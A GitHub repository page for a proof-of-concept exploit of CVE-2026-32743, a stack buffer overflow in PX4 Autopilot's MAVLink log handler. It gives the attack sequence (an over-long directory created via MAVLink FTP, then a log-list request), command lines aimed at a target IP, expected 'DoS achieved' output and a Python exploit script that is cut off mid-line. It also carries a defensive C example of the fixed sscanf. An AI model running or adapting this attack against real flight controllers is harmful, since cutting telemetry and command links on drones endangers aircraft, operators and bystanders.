mbanyamer/CVE-2026-32743-PX4-Autopilot-MavlinkLogHandler-Stack-Buffer-Overflow-DoS-
GitHub: mbanyamer/CVE-2026-32743-PX4-Autopilot-MavlinkLogHandler-Stack-Buffer-Overflow-DoS-
PoC script that exploits a stack buffer overflow in the PX4 Autopilot MavlinkLogHandler, caused by an sscanf call with no width limit: it creates an over-long directory path via MAVLink FTP and then requests the log list to trigger a remote denial of service.
Stars: 0 | Forks: 0
# CVE-2026-32743 - PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS)
Links: [CVE-2026-32743](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-32743) · [CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) · [CWE-121](https://cwe.mitre.org/data/definitions/121.html) · [PX4](https://px4.io/) · [LICENSE](LICENSE) · [Python](https://python.org) · [GitHub](https://github.com/mbanyamer) · [Instagram](https://instagram.com/banyamer_security) · [Twitter](https://twitter.com/banyamer_sec)
## 📜 Description
**CVE-2026-32743** is a **stack buffer overflow** in `MavlinkLogHandler` in PX4 Autopilot **≤1.17.0-rc2**.
The `LogEntry.filepath` buffer is only **60 bytes**, but the `sscanf()` call that parses log directory paths **specifies no width qualifier**.
An attacker with **access to the MAVLink link** can:
1. Use **MAVLink FTP** to create a deeply nested directory under `/fs/microsd/log/` (path length > 60 bytes).
2. Request the log list via `MAV_CMD_REQUEST_LOG_LIST`.
3. The vulnerable `MavlinkLogHandler` copies the long path into the 60-byte buffer → **stack overflow**.
4. The MAVLink task crashes → **loss of telemetry and command capability** → **persistent denial of service** until the system is rebooted.
**Fixed in**: [commit 616b25a](https://github.com/PX4/PX4-Autopilot/commit/616b25a280e229c24d5cf12a03dbf248df89c474), which adds a width qualifier to the `sscanf` call.
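Added example, not PX4's code and not part of the PoC: the unbounded `sscanf` pattern described above is shown beside a hardened form that applies the width qualifier the fix adds, together with a `%n`-based check so that a directory name longer than the buffer is rejected instead of being silently clipped. The 60-byte `LogEntry.filepath` size comes from the description; `parse_log_path` and the sample names are assumptions made for this illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* 59 characters + terminating NUL = the 60-byte filepath buffer described
 * above (assumed layout for this illustration; not PX4's own definitions). */
#define LOG_PATH_MAX 59
#define LOG_PATH_LEN (LOG_PATH_MAX + 1)
#define STR_(x) #x
#define STR(x) STR_(x)            /* turns 59 into "59" inside the format */

/* Vulnerable pattern, for reference only (never run on untrusted input):
 *     sscanf(line, "%s", entry.filepath);
 * "%s" carries no width, so a 70-byte directory name is written past the
 * end of the 60-byte array and into whatever follows it on the stack. */

/* Hardened parser: "%59s" caps the copy at 59 bytes (plus NUL), and %n
 * records how far sscanf got so truncation can be detected and reported.
 * Returns 0 on success, -1 if nothing was read or the name did not fit. */
int parse_log_path(const char *line, char filepath[LOG_PATH_LEN])
{
    int consumed = 0;
    filepath[0] = '\0';
    if (sscanf(line, "%" STR(LOG_PATH_MAX) "s%n", filepath, &consumed) != 1)
        return -1;
    /* If the next unread byte is neither whitespace nor end of string, the
     * token hit the width limit: reject it rather than use a clipped path. */
    if (line[consumed] != '\0' && !isspace((unsigned char)line[consumed]))
        return -1;
    return 0;
}

/* Constructed sample: a directory name of 70 'A's, like the one in the PoC.
 * Returns 1 when the name is rejected and the buffer was not overrun. */
int demo_long_name_is_rejected(void)
{
    char filepath[LOG_PATH_LEN];
    char long_name[80];
    memset(long_name, 'A', 70);
    long_name[70] = '\0';
    int rc = parse_log_path(long_name, filepath);
    /* rc == -1 and filepath holds exactly 59 'A's plus NUL: no overflow. */
    return (rc == -1 && strlen(filepath) == LOG_PATH_MAX) ? 1 : 0;
}
```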
## 🔥 Attack Flow Diagram
```mermaid
sequenceDiagram
participant Attacker
participant PX4 as PX4 Flight Controller
participant SD as SD Card (/fs/microsd/log/)
Attacker->>PX4: 1. Open MAVLink connection (UDP 14550)
PX4-->>Attacker: Heartbeat (system/component IDs)
Note over Attacker,PX4: Step 2: Create long directory via MAVLink FTP
Attacker->>PX4: MAVLink FTP: OpenFile( path = "/fs/microsd/log/" + "A"*70, flags=O_CREAT|O_DIRECTORY )
PX4->>SD: Create directory (named 70×'A')
SD-->>PX4: OK
Note over Attacker,PX4: Step 3: Trigger overflow by requesting log list
Attacker->>PX4: MAV_CMD_REQUEST_LOG_LIST (command 261)
PX4->>PX4: MavlinkLogHandler::list() reads log directory
PX4->>PX4: sscanf(path, "%s", LogEntry.filepath) ← NO width limit!
Note right of PX4: Buffer overflow: 70 bytes written into 60-byte buffer
PX4--xAttacker: MAVLink task crashes → no more heartbeats/commands
Note over Attacker,PX4: ✅ DoS achieved – flight controller unmanageable
```
## ⚙️ Prerequisites
- A target device running **PX4** **≤ `1.17.0-rc2`** with an **SD card** mounted (logs are stored under `/fs/microsd/log/`).
- **MAVLink FTP** enabled (on by default in most PX4 builds).
- **Network access** to the flight controller's MAVLink UDP port (default `14550`).
- **Python 3.6+** with `pymavlink` installed:
```
pip install pymavlink
```
## 🚀 Usage
```
git clone https://github.com/mbanyamer/CVE-2026-32743-PoC
cd CVE-2026-32743-PoC
python3 exploit.py <target_ip> [--port <port>]
```
| Parameter | Description | Default |
|--------------|--------------------------------------|-----------|
| `target_ip` | IP address of the flight controller | *required* |
| `--port` | MAVLink UDP port | `14550` |
### Example
```
python3 exploit.py 192.168.1.10 --port 14550
```
**Expected output** (successful DoS):
```
[*] Connecting to MAVLink target: 192.168.1.10:14550
[+] Heartbeat received from system 1, component 1
[*] Creating long directory: /fs/microsd/log/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (length 80 bytes)
[+] Directory created (or already existed).
[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...
[*] Waiting for crash (target will stop responding)...
[+] Target unresponsive – DoS achieved!
```
## 📄 PoC Code
```python
#!/usr/bin/env python3
# Exploit Title: PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS)
# CVE: CVE-2026-32743
# Date: 2026-05-08
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://px4.io/
# Software Link: https://github.com/PX4/PX4-Autopilot
# Affected Versions: Versions 1.17.0-rc2 and below
# Tested On: PX4 v1.17.0-rc2 (Pixhawk)
# Category: DoS
# Platform: Embedded (PX4 Autopilot)
# Vulnerability Type: Stack-based Buffer Overflow
# CVSS: 7.5 (High)
# CWE: CWE-121
# Description: Creates an overly long directory via MAVLink FTP, then requests log list.
# Fixed In: https://github.com/PX4/PX4-Autopilot/commit/616b25a
# Usage: python3 exploit.py <target_ip> [--port <port>]
print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║
║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║
║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║
║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║
║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║
║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║
║ ║
║ [ b a n y a m e r _ s e c u r i t y ] ║
║ ║
║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║
║ ║
║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ Exploit : CVE-2026-32743 ║
║ Target : PX4 Autopilot • MAVLink • Log Handler ║
║ ║
║ Status : ACTIVE ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")
import time
import struct
import argparse
from pymavlink import mavutil
from pymavlink.dialects.v20 import common as mavlink2

def send_ftp_command(mav, seq, payload):
    # Wrap a raw MAVLink FTP payload in a FILE_TRANSFER_PROTOCOL message.
    # The encoder lives on the connection's .mav object and the message also
    # carries a target_network field (0 = default network).
    msg = mav.mav.file_transfer_protocol_encode(
        target_network=0,
        target_system=mav.target_system,
        target_component=mav.target_component,
        payload=payload
    )
    mav.mav.send(msg)

def ftp_create_directory(mav, path):
    # Open flags used by the PoC for the MAVLink FTP request
    O_CREAT = 0x04
    O_DIRECTORY = 0x08
    seq = 1
    # NUL-terminated path as carried in the FTP payload
    path_bytes = path.encode('utf-8') + b'\x00'
    payload = struct.pack('
```
Tags: C++, CVE-2026-32743, CWE-121, DoS, MAVLink, PoC, PX4, Python, protocol vulnerability, security vulnerability, crash, data wiping, drones, drone security, no backdoor, brute force, stack overflow, buffer overflow, cybersecurity, avionics, path traversal, remote denial of service, reverse-engineering tools, privacy protection, flight control systems